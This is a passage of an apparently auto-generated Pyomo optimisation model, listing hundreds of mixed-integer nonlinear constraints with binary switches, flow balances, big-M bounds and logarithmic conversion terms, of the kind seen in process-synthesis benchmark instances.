Constraint(expr= m.b743 - m.b839 <= 0) m.c1395 = Constraint(expr= - m.b743 + m.b744 - m.b840 <= 0) m.c1396 = Constraint(expr= - m.b743 - m.b744 + m.b745 - m.b841 <= 0) m.c1397 = Constraint(expr= m.b746 - m.b842 <= 0) m.c1398 = Constraint(expr= - m.b746 + m.b747 - m.b843 <= 0) m.c1399 = Constraint(expr= - m.b746 - m.b747 + m.b748 - m.b844 <= 0) m.c1400 = Constraint(expr= m.b749 - m.b845 <= 0) m.c1401 = Constraint(expr= - m.b749 + m.b750 - m.b846 <= 0) m.c1402 = Constraint(expr= - m.b749 - m.b750 + m.b751 - m.b847 <= 0) m.c1403 = Constraint(expr= m.b755 - m.b851 <= 0) m.c1404 = Constraint(expr= - m.b755 + m.b756 - m.b852 <= 0) m.c1405 = Constraint(expr= - m.b755 - m.b756 + m.b757 - m.b853 <= 0) m.c1406 = Constraint(expr= m.b758 - m.b854 <= 0) m.c1407 = Constraint(expr= - m.b758 + m.b759 - m.b855 <= 0) m.c1408 = Constraint(expr= - m.b758 - m.b759 + m.b760 - m.b856 <= 0) m.c1409 = Constraint(expr= m.b761 - m.b857 <= 0) m.c1410 = Constraint(expr= - m.b761 + m.b762 - m.b858 <= 0) m.c1411 = Constraint(expr= - m.b761 - m.b762 + m.b763 - m.b859 <= 0) m.c1412 = Constraint(expr= m.b767 - m.b863 <= 0) m.c1413 = Constraint(expr= - m.b767 + m.b768 - m.b864 <= 0) m.c1414 = Constraint(expr= - m.b767 - m.b768 + m.b769 - m.b865 <= 0) m.c1415 = Constraint(expr= m.b770 - m.b866 <= 0) m.c1416 = Constraint(expr= - m.b770 + m.b771 - m.b867 <= 0) m.c1417 = Constraint(expr= - m.b770 - m.b771 + m.b772 - m.b868 <= 0) m.c1418 = Constraint(expr= m.b773 - m.b869 <= 0) m.c1419 = Constraint(expr= - m.b773 + m.b774 - m.b870 <= 0) m.c1420 = Constraint(expr= - m.b773 - m.b774 + m.b775 - m.b871 <= 0) m.c1421 = Constraint(expr= m.b779 - m.b875 <= 0) m.c1422 = Constraint(expr= - m.b779 + m.b780 - m.b876 <= 0) m.c1423 = Constraint(expr= - m.b779 - m.b780 + m.b781 - m.b877 <= 0) m.c1424 = Constraint(expr= m.b782 - m.b878 <= 0) m.c1425 = Constraint(expr= - m.b782 + m.b783 - m.b879 <= 0) m.c1426 = Constraint(expr= - m.b782 - m.b783 + m.b784 - m.b880 <= 0) m.c1427 = Constraint(expr= m.b785 - m.b881 <= 0) m.c1428 = Constraint(expr= - m.b785 + m.b786 - m.b882 <= 0) m.c1429 = Constraint(expr= - m.b785 - m.b786 + m.b787 - m.b883 <= 0) m.c1430 = Constraint(expr= m.b791 - m.b887 <= 0) m.c1431 = Constraint(expr= - m.b791 + m.b792 - m.b888 <= 0) m.c1432 = Constraint(expr= - m.b791 - m.b792 + m.b793 - m.b889 <= 0) m.c1433 = Constraint(expr= m.b794 - m.b890 <= 0) m.c1434 = Constraint(expr= - m.b794 + m.b795 - m.b891 <= 0) m.c1435 = Constraint(expr= - m.b794 - m.b795 + m.b796 - m.b892 <= 0) m.c1436 = Constraint(expr= m.b797 - m.b893 <= 0) m.c1437 = Constraint(expr= - m.b797 + m.b798 - m.b894 <= 0) m.c1438 = Constraint(expr= - m.b797 - m.b798 + m.b799 - m.b895 <= 0) m.c1439 = Constraint(expr= m.x14 - m.x95 - m.x896 == 0) m.c1440 = Constraint(expr= m.x15 - m.x96 - m.x897 == 0) m.c1441 = Constraint(expr= m.x16 - m.x97 - m.x898 == 0) m.c1442 = Constraint(expr= m.x26 - m.x98 - m.x929 == 0) m.c1443 = Constraint(expr= m.x27 - m.x99 - m.x930 == 0) m.c1444 = Constraint(expr= m.x28 - m.x100 - m.x931 == 0) m.c1445 = Constraint(expr= m.x59 - m.x101 - m.x980 == 0) m.c1446 = Constraint(expr= m.x60 - m.x102 - m.x981 == 0) m.c1447 = Constraint(expr= m.x61 - m.x103 - m.x982 == 0) m.c1448 = Constraint(expr= m.x62 - m.x104 - m.x983 == 0) m.c1449 = Constraint(expr= m.x63 - m.x105 - m.x984 == 0) m.c1450 = Constraint(expr= m.x64 - m.x106 - m.x985 == 0) m.c1451 = Constraint(expr= m.x896 - m.x899 - m.x902 == 0) m.c1452 = Constraint(expr= m.x897 - m.x900 - m.x903 == 0) m.c1453 = Constraint(expr= m.x898 - m.x901 - m.x904 == 0) m.c1454 = Constraint(expr= - m.x905 - m.x908 + m.x911 == 0) m.c1455 = Constraint(expr= - m.x906 - m.x909 + m.x912 == 0) m.c1456 = Constraint(expr= - m.x907 - m.x910 + m.x913 == 0) m.c1457 = Constraint(expr= m.x911 - m.x914 - m.x917 == 0) m.c1458 = Constraint(expr= m.x912 - m.x915 - m.x918 == 0) m.c1459 = Constraint(expr= m.x913 - m.x916 - m.x919 == 0) m.c1460 = Constraint(expr= m.x917 - m.x920 - m.x923 - m.x926 == 0) m.c1461 = Constraint(expr= m.x918 - m.x921 - m.x924 - m.x927 == 0) m.c1462 = Constraint(expr= m.x919 - m.x922 - m.x925 - m.x928 == 0) m.c1463 = Constraint(expr= m.x932 - m.x941 - m.x944 == 0) m.c1464 = Constraint(expr= m.x933 - m.x942 - m.x945 == 0) m.c1465 = Constraint(expr= m.x934 - m.x943 - m.x946 == 0) m.c1466 = Constraint(expr= m.x938 - m.x947 - m.x950 - m.x953 == 0) m.c1467 = Constraint(expr= m.x939 - m.x948 - m.x951 - m.x954 == 0) m.c1468 = Constraint(expr= m.x940 - m.x949 - m.x952 - m.x955 == 0) m.c1469 = Constraint(expr= m.x962 - m.x974 - m.x977 == 0) m.c1470 = Constraint(expr= m.x963 - m.x975 - m.x978 == 0) m.c1471 = Constraint(expr= m.x964 - m.x976 - m.x979 == 0) m.c1472 = Constraint(expr= - m.x965 - m.x983 + m.x986 == 0) m.c1473 = Constraint(expr= - m.x966 - m.x984 + m.x987 == 0) m.c1474 = Constraint(expr= - m.x967 - m.x985 + m.x988 == 0) m.c1475 = Constraint(expr= m.x968 - m.x989 - m.x992 == 0) m.c1476 = Constraint(expr= m.x969 - m.x990 - m.x993 == 0) m.c1477 = Constraint(expr= m.x970 - m.x991 - m.x994 == 0) m.c1478 = Constraint(expr= m.x971 - m.x995 - m.x998 - m.x1001 == 0) m.c1479 = Constraint(expr= m.x972 - m.x996 - m.x999 - m.x1002 == 0) m.c1480 = Constraint(expr= m.x973 - m.x997 - m.x1000 - m.x1003 == 0) m.c1481 = Constraint(expr= m.x1028 - m.x1031 == 0) m.c1482 = Constraint(expr= m.x1029 - m.x1032 == 0) m.c1483 = Constraint(expr= m.x1030 - m.x1033 == 0) m.c1484 = Constraint(expr= m.x1031 - m.x1034 - m.x1037 == 0) m.c1485 = Constraint(expr= m.x1032 - m.x1035 - m.x1038 == 0) m.c1486 = Constraint(expr= m.x1033 - m.x1036 - m.x1039 == 0) m.c1487 = Constraint(expr= - m.x1040 - m.x1043 + m.x1046 == 0) m.c1488 = Constraint(expr= - m.x1041 - m.x1044 + m.x1047 == 0) m.c1489 = Constraint(expr= - m.x1042 - m.x1045 + m.x1048 == 0) m.c1490 = Constraint(expr= m.x1046 - m.x1049 - m.x1052 == 0) m.c1491 = Constraint(expr= m.x1047 - m.x1050 - m.x1053 == 0) m.c1492 = Constraint(expr= m.x1048 - m.x1051 - m.x1054 == 0) m.c1493 = Constraint(expr= m.x1052 - m.x1055 - m.x1058 - m.x1061 == 0) m.c1494 = Constraint(expr= m.x1053 - m.x1056 - m.x1059 - m.x1062 == 0) m.c1495 = Constraint(expr= m.x1054 - m.x1057 - m.x1060 - m.x1063 == 0) m.c1496 = Constraint(expr= m.x1067 - m.x1076 - m.x1079 == 0) m.c1497 = Constraint(expr= m.x1068 - m.x1077 - m.x1080 == 0) m.c1498 = Constraint(expr= m.x1069 - m.x1078 - m.x1081 == 0) m.c1499 = Constraint(expr= m.x1073 - m.x1082 - m.x1085 - m.x1088 == 0) m.c1500 = Constraint(expr= m.x1074 - m.x1083 - m.x1086 - m.x1089 == 0) m.c1501 = Constraint(expr= m.x1075 - m.x1084 - m.x1087 - m.x1090 == 0) m.c1502 = Constraint(expr=(m.x1118/(0.001 + 0.999*m.b1490) - log(1 + m.x1106/(0.001 + 0.999*m.b1490)))*(0.001 + 0.999* m.b1490) <= 0) m.c1503 = Constraint(expr=(m.x1119/(0.001 + 0.999*m.b1491) - log(1 + m.x1107/(0.001 + 0.999*m.b1491)))*(0.001 + 0.999* m.b1491) <= 0) m.c1504 = Constraint(expr=(m.x1120/(0.001 + 0.999*m.b1492) - log(1 + m.x1108/(0.001 + 0.999*m.b1492)))*(0.001 + 0.999* m.b1492) <= 0) m.c1505 = Constraint(expr= m.x1109 == 0) m.c1506 = Constraint(expr= m.x1110 == 0) m.c1507 = Constraint(expr= m.x1111 == 0) m.c1508 = Constraint(expr= m.x1121 == 0) m.c1509 = Constraint(expr= m.x1122 == 0) m.c1510 = Constraint(expr= m.x1123 == 0) m.c1511 = Constraint(expr= m.x899 - m.x1106 - m.x1109 == 0) m.c1512 = Constraint(expr= m.x900 - m.x1107 - m.x1110 == 0) m.c1513 = Constraint(expr= m.x901 - m.x1108 - m.x1111 == 0) m.c1514 = Constraint(expr= m.x905 - m.x1118 - m.x1121 == 0) m.c1515 = Constraint(expr= m.x906 - m.x1119 - m.x1122 == 0) m.c1516 = Constraint(expr= m.x907 - m.x1120 - m.x1123 == 0) m.c1517 = Constraint(expr= m.x1106 - 40*m.b1490 <= 0) m.c1518 = Constraint(expr= m.x1107 - 40*m.b1491 <= 0) m.c1519 = Constraint(expr= m.x1108 - 40*m.b1492 <= 0) m.c1520 = Constraint(expr= m.x1109 + 40*m.b1490 <= 40) m.c1521 = Constraint(expr= m.x1110 + 40*m.b1491 <= 40) m.c1522 = Constraint(expr= m.x1111 + 40*m.b1492 <= 40) m.c1523 = Constraint(expr= m.x1118 - 3.71357206670431*m.b1490 <= 0) m.c1524 = Constraint(expr= m.x1119 - 3.71357206670431*m.b1491 <= 0) m.c1525 = Constraint(expr= m.x1120 - 3.71357206670431*m.b1492 <= 0) m.c1526 = Constraint(expr= m.x1121 + 3.71357206670431*m.b1490 <= 3.71357206670431) m.c1527 = Constraint(expr= m.x1122 + 3.71357206670431*m.b1491 <= 3.71357206670431) m.c1528 = Constraint(expr= m.x1123 + 3.71357206670431*m.b1492 <= 3.71357206670431) m.c1529 = Constraint(expr=(m.x1124/(0.001 + 0.999*m.b1493) - 1.2*log(1 + m.x1112/(0.001 + 0.999*m.b1493)))*(0.001 + 0.999*m.b1493) <= 0) m.c1530 = Constraint(expr=(m.x1125/(0.001 + 0.999*m.b1494) - 1.2*log(1 + m.x1113/(0.001 + 0.999*m.b1494)))*(0.001 + 0.999*m.b1494) <= 0) m.c1531 = Constraint(expr=(m.x1126/(0.001 + 0.999*m.b1495) - 1.2*log(1 + m.x1114/(0.001 + 0.999*m.b1495)))*(0.001 + 0.999*m.b1495) <= 0) m.c1532 = Constraint(expr= m.x1115 == 0) m.c1533 = Constraint(expr= m.x1116 == 0) m.c1534 = Constraint(expr= m.x1117 == 0) m.c1535 = Constraint(expr= m.x1127 == 0) m.c1536 = Constraint(expr= m.x1128 == 0) m.c1537 = Constraint(expr= m.x1129 == 0) m.c1538 = Constraint(expr= m.x902 - m.x1112 - m.x1115 == 0) m.c1539 = Constraint(expr= m.x903 - m.x1113 - m.x1116 == 0) m.c1540 = Constraint(expr= m.x904 - m.x1114 - m.x1117 == 0) m.c1541 = Constraint(expr= m.x908 - m.x1124 - m.x1127 == 0) m.c1542 = Constraint(expr= m.x909 - m.x1125 - m.x1128 == 0) m.c1543 = Constraint(expr= m.x910 - m.x1126 - m.x1129 == 0) m.c1544 = Constraint(expr= m.x1112 - 40*m.b1493 <= 0) m.c1545 = Constraint(expr= m.x1113 - 40*m.b1494 <= 0) m.c1546 = Constraint(expr= m.x1114 - 40*m.b1495 <= 0) m.c1547 = Constraint(expr= m.x1115 + 40*m.b1493 <= 40) m.c1548 = Constraint(expr= m.x1116 + 40*m.b1494 <= 40) m.c1549 = Constraint(expr= m.x1117 + 40*m.b1495 <= 40) m.c1550 = Constraint(expr= m.x1124 - 4.45628648004517*m.b1493 <= 0) m.c1551 = Constraint(expr= m.x1125 - 4.45628648004517*m.b1494 <= 0) m.c1552 = Constraint(expr= m.x1126 - 4.45628648004517*m.b1495 <= 0) m.c1553 = Constraint(expr= m.x1127 + 4.45628648004517*m.b1493 <= 4.45628648004517) m.c1554 = Constraint(expr= m.x1128 + 4.45628648004517*m.b1494 <= 4.45628648004517) m.c1555 = Constraint(expr= m.x1129 + 4.45628648004517*m.b1495 <= 4.45628648004517) m.c1556 = Constraint(expr= - 0.75*m.x1130 + m.x1154 == 0) m.c1557 = Constraint(expr= - 0.75*m.x1131 + m.x1155 == 0) m.c1558 = Constraint(expr= - 0.75*m.x1132 + m.x1156 == 0) m.c1559 = Constraint(expr= m.x1133 == 0) m.c1560 = Constraint(expr= m.x1134 == 0) m.c1561 = Constraint(expr= m.x1135 == 0) m.c1562 = Constraint(expr= m.x1157 == 0) m.c1563 = Constraint(expr= m.x1158 == 0) m.c1564 = Constraint(expr= m.x1159 == 0) m.c1565 = Constraint(expr= m.x920 - m.x1130 - m.x1133 == 0) m.c1566 = Constraint(expr= m.x921 - m.x1131 - m.x1134 == 0) m.c1567 = Constraint(expr= m.x922 - m.x1132 - m.x1135 == 0) m.c1568 = Constraint(expr= m.x932 - m.x1154 - m.x1157 == 0) m.c1569 = Constraint(expr= m.x933 - m.x1155 - m.x1158 == 0) m.c1570 = Constraint(expr= m.x934 - m.x1156 - m.x1159 == 0) m.c1571 = Constraint(expr= m.x1130 - 4.45628648004517*m.b1496 <= 0) m.c1572 = Constraint(expr= m.x1131 - 4.45628648004517*m.b1497 <= 0) m.c1573 = Constraint(expr= m.x1132 - 4.45628648004517*m.b1498 <= 0) m.c1574 = Constraint(expr= m.x1133 + 4.45628648004517*m.b1496 <= 4.45628648004517) m.c1575 = Constraint(expr= m.x1134 + 4.45628648004517*m.b1497 <= 4.45628648004517) m.c1576 = Constraint(expr= m.x1135 + 4.45628648004517*m.b1498 <= 4.45628648004517) m.c1577 = Constraint(expr= m.x1154 - 3.34221486003388*m.b1496 <= 0) m.c1578 = Constraint(expr= m.x1155 - 3.34221486003388*m.b1497 <= 0) m.c1579 = Constraint(expr= m.x1156 - 3.34221486003388*m.b1498 <= 0) m.c1580 = Constraint(expr= m.x1157 + 3.34221486003388*m.b1496 <= 3.34221486003388) m.c1581 = Constraint(expr= m.x1158 + 3.34221486003388*m.b1497 <= 3.34221486003388) m.c1582 = Constraint(expr= m.x1159 + 3.34221486003388*m.b1498 <= 3.34221486003388) m.c1583 = Constraint(expr=(m.x1160/(0.001 + 0.999*m.b1499) - 1.5*log(1 + m.x1136/(0.001 + 0.999*m.b1499)))*(0.001 + 0.999*m.b1499) <= 0) m.c1584 = Constraint(expr=(m.x1161/(0.001 + 0.999*m.b1500) - 1.5*log(1 + m.x1137/(0.001 + 0.999*m.b1500)))*(0.001 + 0.999*m.b1500) <= 0) m.c1585 = Constraint(expr=(m.x1162/(0.001 + 0.999*m.b1501) - 1.5*log(1 + m.x1138/(0.001 + 0.999*m.b1501)))*(0.001 + 0.999*m.b1501) <= 0) m.c1586 = Constraint(expr= m.x1139 == 0) m.c1587 = Constraint(expr= m.x1140 == 0) m.c1588 = Constraint(expr= m.x1141 == 0) m.c1589 = Constraint(expr= m.x1166 == 0) m.c1590 = Constraint(expr= m.x1167 == 0) m.c1591 = Constraint(expr= m.x1168 == 0) m.c1592 = Constraint(expr= m.x923 - m.x1136 - m.x1139 == 0) m.c1593 = Constraint(expr= m.x924 - m.x1137 - m.x1140 == 0) m.c1594 = Constraint(expr= m.x925 - m.x1138 - m.x1141 == 0) m.c1595 = Constraint(expr= m.x935 - m.x1160 - m.x1166 == 0) m.c1596 = Constraint(expr= m.x936 - m.x1161 - m.x1167 == 0) m.c1597 = Constraint(expr= m.x937 - m.x1162 - m.x1168 == 0) m.c1598 = Constraint(expr= m.x1136 - 4.45628648004517*m.b1499 <= 0) m.c1599 = Constraint(expr= m.x1137 - 4.45628648004517*m.b1500 <= 0) m.c1600 = Constraint(expr= m.x1138 - 4.45628648004517*m.b1501 <= 0) m.c1601 = Constraint(expr= m.x1139 + 4.45628648004517*m.b1499 <= 4.45628648004517) m.c1602 = Constraint(expr= m.x1140 + 4.45628648004517*m.b1500 <= 4.45628648004517) m.c1603 = Constraint(expr= m.x1141 + 4.45628648004517*m.b1501 <= 4.45628648004517) m.c1604 = Constraint(expr= m.x1160 - 2.54515263975353*m.b1499 <= 0) m.c1605 = Constraint(expr= m.x1161 - 2.54515263975353*m.b1500 <= 0) m.c1606 = Constraint(expr= m.x1162 - 2.54515263975353*m.b1501 <= 0) m.c1607 = Constraint(expr= m.x1166 + 2.54515263975353*m.b1499 <= 2.54515263975353) m.c1608 = Constraint(expr= m.x1167 + 2.54515263975353*m.b1500 <= 2.54515263975353) m.c1609 = Constraint(expr= m.x1168 + 2.54515263975353*m.b1501 <= 2.54515263975353) m.c1610 = Constraint(expr= - m.x1142 + m.x1172 == 0) m.c1611 = Constraint(expr= - m.x1143 + m.x1173 == 0) m.c1612 = Constraint(expr= - m.x1144 + m.x1174 == 0) m.c1613 = Constraint(expr= - 0.5*m.x1148 + m.x1172 == 0) m.c1614 = Constraint(expr= - 0.5*m.x1149 + m.x1173 == 0) m.c1615 = Constraint(expr= - 0.5*m.x1150 + m.x1174 == 0) m.c1616 = Constraint(expr= m.x1145 == 0) m.c1617 = Constraint(expr= m.x1146 == 0) m.c1618 = Constraint(expr= m.x1147 == 0) m.c1619 = Constraint(expr= m.x1151 == 0) m.c1620 = Constraint(expr= m.x1152 == 0) m.c1621 = Constraint(expr= m.x1153 == 0) m.c1622 = Constraint(expr= m.x1175 == 0) m.c1623 = Constraint(expr= m.x1176 == 0) m.c1624 = Constraint(expr= m.x1177 == 0) m.c1625 = Constraint(expr= m.x926 - m.x1142 - m.x1145 == 0) m.c1626 = Constraint(expr= m.x927 - m.x1143 - m.x1146 == 0) m.c1627 = Constraint(expr= m.x928 - m.x1144 - m.x1147 == 0) m.c1628 = Constraint(expr= m.x929 - m.x1148 - m.x1151 == 0) m.c1629 = Constraint(expr= m.x930 - m.x1149 - m.x1152 == 0) m.c1630 = Constraint(expr= m.x931 - m.x1150 - m.x1153 == 0) m.c1631 = Constraint(expr= m.x938 - m.x1172 - m.x1175 == 0) m.c1632 = Constraint(expr= m.x939 - m.x1173 - m.x1176 == 0) m.c1633 = Constraint(expr= m.x940 - m.x1174 - m.x1177 == 0) m.c1634 = Constraint(expr= m.x1142 - 4.45628648004517*m.b1502 <= 0) m.c1635 = Constraint(expr= m.x1143 - 4.45628648004517*m.b1503 <= 0) m.c1636 = Constraint(expr= m.x1144 - 4.45628648004517*m.b1504 <= 0) m.c1637 = Constraint(expr= m.x1145 + 4.45628648004517*m.b1502 <= 4.45628648004517) m.c1638 = Constraint(expr= m.x1146 + 4.45628648004517*m.b1503 <= 4.45628648004517) m.c1639 = Constraint(expr= m.x1147 + 4.45628648004517*m.b1504 <= 4.45628648004517) m.c1640 = Constraint(expr= m.x1148 - 30*m.b1502 <= 0) m.c1641 = Constraint(expr= m.x1149 - 30*m.b1503 <= 0) m.c1642 = Constraint(expr= m.x1150 - 30*m.b1504 <= 0) m.c1643 = Constraint(expr= m.x1151 + 30*m.b1502 <= 30) m.c1644 = Constraint(expr= m.x1152 + 30*m.b1503 <= 30) m.c1645 = Constraint(expr= m.x1153 + 30*m.b1504 <= 30) m.c1646 = Constraint(expr= m.x1172 - 15*m.b1502 <= 0) m.c1647 = Constraint(expr= m.x1173 - 15*m.b1503 <= 0) m.c1648 = Constraint(expr= m.x1174 - 15*m.b1504 <= 0) m.c1649 = Constraint(expr= m.x1175 + 15*m.b1502 <= 15) m.c1650 = Constraint(expr= m.x1176 + 15*m.b1503 <= 15) m.c1651 = Constraint(expr= m.x1177 + 15*m.b1504 <= 15) m.c1652 = Constraint(expr=(m.x1208/(0.001 + 0.999*m.b1505) - 1.25*log(1 + m.x1178/(0.001 + 0.999*m.b1505)))*(0.001 + 0.999*m.b1505) <= 0) m.c1653 = Constraint(expr=(m.x1209/(0.001 + 0.999*m.b1506) - 1.25*log(1 + m.x1179/(0.001 + 0.999*m.b1506)))*(0.001 + 0.999*m.b1506) <= 0) m.c1654 = Constraint(expr=(m.x1210/(0.001 + 0.999*m.b1507) - 1.25*log(1 + m.x1180/(0.001 + 0.999*m.b1507)))*(0.001 + 0.999*m.b1507) <= 0) m.c1655 = Constraint(expr= m.x1181 == 0) m.c1656 = Constraint(expr= m.x1182 == 0) m.c1657 = Constraint(expr= m.x1183 == 0) m.c1658 = Constraint(expr= m.x1214 == 0) m.c1659 = Constraint(expr= m.x1215 == 0) m.c1660 = Constraint(expr= m.x1216 == 0) m.c1661 = Constraint(expr= m.x941 - m.x1178 - m.x1181 == 0) m.c1662 = Constraint(expr= m.x942 - m.x1179 - m.x1182 == 0) m.c1663 = Constraint(expr= m.x943 - m.x1180 - m.x1183 == 0) m.c1664 = Constraint(expr= m.x956 - m.x1208 - m.x1214 == 0) m.c1665 = Constraint(expr= m.x957 - m.x1209 - m.x1215 == 0) m.c1666 = Constraint(expr= m.x958 - m.x1210 - m.x1216 == 0) m.c1667 = Constraint(expr= m.x1178 - 3.34221486003388*m.b1505 <= 0) m.c1668 = Constraint(expr= m.x1179 - 3.34221486003388*m.b1506 <= 0) m.c1669 = Constraint(expr= m.x1180 - 3.34221486003388*m.b1507 <= 0) m.c1670 = Constraint(expr= m.x1181 + 3.34221486003388*m.b1505 <= 3.34221486003388) m.c1671 = Constraint(expr= m.x1182 + 3.34221486003388*m.b1506 <= 3.34221486003388) m.c1672 = Constraint(expr= m.x1183 + 3.34221486003388*m.b1507 <= 3.34221486003388) m.c1673 = Constraint(expr= m.x1208 - 1.83548069293539*m.b1505 <= 0) m.c1674 = Constraint(expr= m.x1209 - 1.83548069293539*m.b1506 <= 0) m.c1675 = Constraint(expr= m.x1210 - 1.83548069293539*m.b1507 <= 0) m.c1676 = Constraint(expr= m.x1214 + 1.83548069293539*m.b1505 <= 1.83548069293539) m.c1677 = Constraint(expr= m.x1215 + 1.83548069293539*m.b1506 <= 1.83548069293539) m.c1678 = Constraint(expr= m.x1216 + 1.83548069293539*m.b1507 <= 1.83548069293539) m.c1679 = Constraint(expr=(m.x1220/(0.001 + 0.999*m.b1508) - 0.9*log(1 + m.x1184/(0.001 + 0.999*m.b1508)))*(0.001 + 0.999*m.b1508) <= 0) m.c1680 = Constraint(expr=(m.x1221/(0.001 + 0.999*m.b1509) - 0.9*log(1 + m.x1185/(0.001 + 0.999*m.b1509)))*(0.001 + 0.999*m.b1509) <= 0) m.c1681 = Constraint(expr=(m.x1222/(0.001 + 0.999*m.b1510) - 0.9*log(1 + m.x1186/(0.001 + 0.999*m.b1510)))*(0.001 + 0.999*m.b1510) <= 0) m.c1682 = Constraint(expr= m.x1187 == 0) m.c1683 = Constraint(expr= m.x1188 == 0) m.c1684 = Constraint(expr= m.x1189 == 0) m.c1685 = Constraint(expr= m.x1226 == 0) m.c1686 = Constraint(expr= m.x1227 == 0) m.c1687 = Constraint(expr= m.x1228 == 0) m.c1688 = Constraint(expr= m.x944 - m.x1184 - m.x1187 == 0) m.c1689 = Constraint(expr= m.x945 - m.x1185 - m.x1188 == 0) m.c1690 = Constraint(expr= m.x946 - m.x1186 - m.x1189 == 0) m.c1691 = Constraint(expr= m.x959 - m.x1220 - m.x1226 == 0) m.c1692 = Constraint(expr= m.x960 - m.x1221 - m.x1227 == 0) m.c1693 = Constraint(expr= m.x961 - m.x1222 - m.x1228 == 0) m.c1694 = Constraint(expr= m.x1184 - 3.34221486003388*m.b1508 <= 0) m.c1695 = Constraint(expr= m.x1185 - 3.34221486003388*m.b1509 <= 0) m.c1696 = Constraint(expr= m.x1186 - 3.34221486003388*m.b1510 <= 0) m.c1697 = Constraint(expr= m.x1187 + 3.34221486003388*m.b1508 <= 3.34221486003388) m.c1698 = Constraint(expr= m.x1188 + 3.34221486003388*m.b1509 <= 3.34221486003388) m.c1699 = Constraint(expr= m.x1189 + 3.34221486003388*m.b1510 <= 3.34221486003388) m.c1700 = Constraint(expr= m.x1220 - 1.32154609891348*m.b1508 <= 0) m.c1701 = Constraint(expr= m.x1221 - 1.32154609891348*m.b1509 <= 0) m.c1702 = Constraint(expr= m.x1222 - 1.32154609891348*m.b1510 <= 0) m.c1703 = Constraint(expr= m.x1226 + 1.32154609891348*m.b1508 <= 1.32154609891348) m.c1704 = Constraint(expr= m.x1227 + 1.32154609891348*m.b1509 <= 1.32154609891348) m.c1705 = Constraint(expr= m.x1228 + 1.32154609891348*m.b1510 <= 1.32154609891348) m.c1706 = Constraint(expr=(m.x1232/(0.001 + 0.999*m.b1511) - log(1 + m.x1163/(0.001 + 0.999*m.b1511)))*(0.001 + 0.999* m.b1511) <= 0) m.c1707 = Constraint(expr=(m.x1233/(0.001 + 0.999*m.b1512) - log(1 + m.x1164/(0.001 + 0.999*m.b1512)))*(0.001 + 0.999* m.b1512) <= 0) m.c1708 = Constraint(expr=(m.x1234/(0.001 + 0.999*m.b1513) - log(1 + m.x1165/(0.001 + 0.999*m.b1513)))*(0.001 + 0.999* m.b1513) <= 0) m.c1709 = Constraint(expr= m.x1169 == 0) m.c1710 = Constraint(expr= m.x1170 == 0) m.c1711 = Constraint(expr= m.x1171 == 0) m.c1712 = Constraint(expr= m.x1235 == 0) m.c1713 = Constraint(expr= m.x1236 == 0) m.c1714 = Constraint(expr= m.x1237 == 0) m.c1715 = Constraint(expr= m.x935 - m.x1163 - m.x1169 == 0) m.c1716 = Constraint(expr= m.x936 - m.x1164 - m.x1170 == 0) m.c1717 = Constraint(expr= m.x937 - m.x1165 - m.x1171 == 0) m.c1718 = Constraint(expr= m.x962 - m.x1232 - m.x1235 == 0) m.c1719 = Constraint(expr= m.x963 - m.x1233 - m.x1236 == 0) m.c1720 = Constraint(expr= m.x964 - m.x1234 - m.x1237 == 0) m.c1721 = Constraint(expr= m.x1163 - 2.54515263975353*m.b1511 <= 0) m.c1722 = Constraint(expr= m.x1164 - 2.54515263975353*m.b1512 <= 0) m.c1723 = Constraint(expr= m.x1165 - 2.54515263975353*m.b1513 <= 0) m.c1724 = Constraint(expr= m.x1169 + 2.54515263975353*m.b1511 <= 2.54515263975353) m.c1725 = Constraint(expr= m.x1170 + 2.54515263975353*m.b1512 <= 2.54515263975353) m.c1726 = Constraint(expr= m.x1171 + 2.54515263975353*m.b1513 <= 2.54515263975353) m.c1727 = Constraint(expr= m.x1232 - 1.26558121681553*m.b1511 <= 0) m.c1728 = Constraint(expr= m.x1233 - 1.26558121681553*m.b1512 <= 0) m.c1729 = Constraint(expr= m.x1234 - 1.26558121681553*m.b1513 <= 0) m.c1730 = Constraint(expr= m.x1235 + 1.26558121681553*m.b1511 <= 1.26558121681553) m.c1731 = Constraint(expr= m.x1236 + 1.26558121681553*m.b1512 <= 1.26558121681553) m.c1732 = Constraint(expr= m.x1237 + 1.26558121681553*m.b1513 <= 1.26558121681553) m.c1733 = Constraint(expr= - 0.9*m.x1190 + m.x1238 == 0) m.c1734 = Constraint(expr= - 0.9*m.x1191 + m.x1239 == 0) m.c1735 = Constraint(expr= - 0.9*m.x1192 + m.x1240 == 0) m.c1736 = Constraint(expr= m.x1193 == 0) m.c1737 = Constraint(expr= m.x1194 == 0) m.c1738 = Constraint(expr= m.x1195 == 0) m.c1739 = Constraint(expr= m.x1241 == 0) m.c1740 = Constraint(expr= m.x1242 == 0) m.c1741 = Constraint(expr= m.x1243 == 0) m.c1742 = Constraint(expr= m.x947 - m.x1190 - m.x1193 == 0) m.c1743 = Constraint(expr= m.x948 - m.x1191 - m.x1194 == 0) m.c1744 = Constraint(expr= m.x949 - m.x1192 - m.x1195 == 0) m.c1745 = Constraint(expr= m.x965 - m.x1238 - m.x1241 == 0) m.c1746 = Constraint(expr= m.x966 - m.x1239 - m.x1242 == 0) m.c1747 = Constraint(expr= m.x967 - m.x1240 - m.x1243 == 0) m.c1748 = Constraint(expr= m.x1190 - 15*m.b1514 <= 0) m.c1749 = Constraint(expr= m.x1191 - 15*m.b1515 <= 0) m.c1750 = Constraint(expr= m.x1192 - 15*m.b1516 <= 0) m.c1751 = Constraint(expr= m.x1193 + 15*m.b1514 <= 15) m.c1752 = Constraint(expr= m.x1194 + 15*m.b1515 <= 15) m.c1753 = Constraint(expr= m.x1195 + 15*m.b1516 <= 15) m.c1754 = Constraint(expr= m.x1238 - 13.5*m.b1514 <= 0) m.c1755 = Constraint(expr= m.x1239 - 13.5*m.b1515 <= 0) m.c1756 = Constraint(expr= m.x1240 - 13.5*m.b1516 <= 0) m.c1757 = Constraint(expr= m.x1241 + 13.5*m.b1514 <= 13.5) m.c1758 = Constraint(expr= m.x1242 + 13.5*m.b1515 <= 13.5) m.c1759 = Constraint(expr= m.x1243 + 13.5*m.b1516 <= 13.5) m.c1760 = Constraint(expr= - 0.6*m.x1196 + m.x1244 == 0) m.c1761 = Constraint(expr= - 0.6*m.x1197 + m.x1245 == 0) m.c1762 = Constraint(expr= - 0.6*m.x1198 + m.x1246 == 0) m.c1763 = Constraint(expr= m.x1199 == 0) m.c1764 = Constraint(expr= m.x1200 == 0) m.c1765 = Constraint(expr= m.x1201 == 0) m.c1766 = Constraint(expr= m.x1247 == 0) m.c1767 = Constraint(expr= m.x1248 == 0) m.c1768 = Constraint(expr= m.x1249 == 0) m.c1769 = Constraint(expr= m.x950 - m.x1196 - m.x1199 == 0) m.c1770 = Constraint(expr= 